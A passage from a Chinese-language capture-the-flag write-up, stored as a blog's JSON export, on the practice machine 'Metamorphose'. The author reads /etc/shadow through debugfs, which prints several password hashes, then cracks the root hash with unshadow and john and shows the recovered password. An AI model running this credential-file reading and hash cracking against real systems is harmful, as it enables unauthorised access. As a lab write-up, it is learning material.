the inode structure in hex\njournal_open, jo         Open the journal\njournal_close, jc        Close the journal\njournal_write, jw        Write a transaction to the journal\njournal_run, jr          Recover the journal\nhelp                     Display info on command or topic.\nlist_requests, lr, ?     List available commands.\nquit, q                  Leave the subsystem.\n\ndebugfs:  cat \/etc\/shadow\nroot:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16\/ENdKsxR1omAqB:19779:0:99999:7:::\ndaemon:*:19779:0:99999:7:::\nbin:*:19779:0:99999:7:::\nsys:*:19779:0:99999:7:::\nsync:*:19779:0:99999:7:::\ngames:*:19779:0:99999:7:::\nman:*:19779:0:99999:7:::\nlp:*:19779:0:99999:7:::\nmail:*:19779:0:99999:7:::\nnews:*:19779:0:99999:7:::\nuucp:*:19779:0:99999:7:::\nproxy:*:19779:0:99999:7:::\nwww-data:*:19779:0:99999:7:::\nbackup:*:19779:0:99999:7:::\nlist:*:19779:0:99999:7:::\nirc:*:19779:0:99999:7:::\n_apt:*:19779:0:99999:7:::\nnobody:*:19779:0:99999:7:::\nsystemd-network:!*:19779::::::\nsystemd-timesync:!*:19779::::::\nmessagebus:!:19779::::::\navahi-autoipd:!:19779::::::\nsshd:!:19779::::::\nntpsec:!:19779::::::\nepmd:!:19779::::::\nmelbourne:$y$j9T$9AW5vMwISGEth89TZdLQX.$3oxC.VAZ57n4S94eRdZzcsGbgIoiAxWTdCP7afTV7x2:19779:0:99999:7:::\ncoralie:$y$j9T$knJbyxpFrCvXDa\/DDdck\/1$GKzq8p7o9Qjurg6bzmM6TZtilp3qY8caDnkDYDJas35:19779:0:99999:7:::<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat passwd\nroot:x:0:0:root:\/root:\/bin\/bash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat shadow\nroot:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16\/ENdKsxR1omAqB:19779:0:99999:7:::\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ unshadow passwd shadow &gt; crack                        \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat crack     \nroot:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16\/ENdKsxR1omAqB:0:0:root:\/root:\/bin\/bash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt crack --format=crypt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (crypt, generic crypt(3) [?\/64])\nCost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes\nCost 2 (algorithm specific iterations) is 1 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nqazwsxedc        (root)     \n1g 0:00:00:11 DONE (2024-08-05 12:57) 0.08554g\/s 172.4p\/s 172.4c\/s 172.4C\/s amore..jesusfreak\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058529.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058529.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240806005814286\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=hWFoDmhdaws\">https:\/\/www.youtube.com\/watch?v=hWFoDmhdaws<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Metamorphose \u8fd9\u4e2a\u9776\u673a\u5f88\u96be\uff0c\u7fa4\u91cc\u7684\u5e08\u5085\u4e5f\u641e\u4e86\u5f88\u957f\u65f6\u95f4\uff0c\u53ef\u60dc\u8fdb\u5c55\u90fd\u4e0d\u5927\uff0c\u4e0b\u8f7d\u4e0b\u6765\u770b\u4e00\u4e0b\u54c8\uff01 &#038;quo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-769","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=769"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/769\/revisions"}],"predecessor-version":[{"id":770,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/769\/revisions\/770"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=769"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}